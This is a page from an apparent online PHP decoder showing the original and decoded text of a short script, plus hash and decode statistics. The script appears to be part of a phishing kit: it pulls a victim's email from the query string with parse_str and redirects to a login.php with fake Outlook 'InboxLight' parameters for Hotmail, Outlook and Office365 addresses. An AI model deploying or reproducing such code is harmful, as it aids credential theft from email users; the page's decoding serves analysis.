Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; parse_str(parse..

Decoded Output download

<?php  
 
	$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 
	parse_str(parse_url($url, PHP_URL_QUERY)); 
	$domain = explode('@', $email); 
	 
	$domain_check = '@'.strtolower($domain[1]); 
	 
	if(stripos($domain_check, '@hotmail.') !== false || stripos($domain_check, '@outlook.') !== false || stripos($domain_check, '@office365.') !== false){ 
		header('Location: login.php?ul=_LkeFUq_VJOXRTIPtoGYDw17dsfsfd18&fid.18InboxLight.aspxn.1774256418&fid.1r245964252813InboxLight94552_Product-email&email='.$email); 
	} 
	 
	else { 
		header('Location: login.php?ul=_LkeFUq_VJOXRTIPtoGYDw17dsfsfd18&fid.18InboxLight.aspxn.1774256418&fid.1r245964252813InboxLight94552_Product-email&email='.$email); 
	} 
		 
?>

Did this file decode correctly?

Original Code

<?php 

	$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
	parse_str(parse_url($url, PHP_URL_QUERY));
	$domain = explode('@', $email);
	
	$domain_check = '@'.strtolower($domain[1]);
	
	if(stripos($domain_check, '@hotmail.') !== false || stripos($domain_check, '@outlook.') !== false || stripos($domain_check, '@office365.') !== false){
		header('Location: login.php?ul=_LkeFUq_VJOXRTIPtoGYDw17dsfsfd18&fid.18InboxLight.aspxn.1774256418&fid.1r245964252813InboxLight94552_Product-email&email='.$email);
	}
	
	else {
		header('Location: login.php?ul=_LkeFUq_VJOXRTIPtoGYDw17dsfsfd18&fid.18InboxLight.aspxn.1774256418&fid.1r245964252813InboxLight94552_Product-email&email='.$email);
	}
		
?>

Function Calls

None

Variables

$url http://NoneNone

Stats

MD5 e374d62bb85b9434c377027215145126
Eval Count 0
Decode Time 89 ms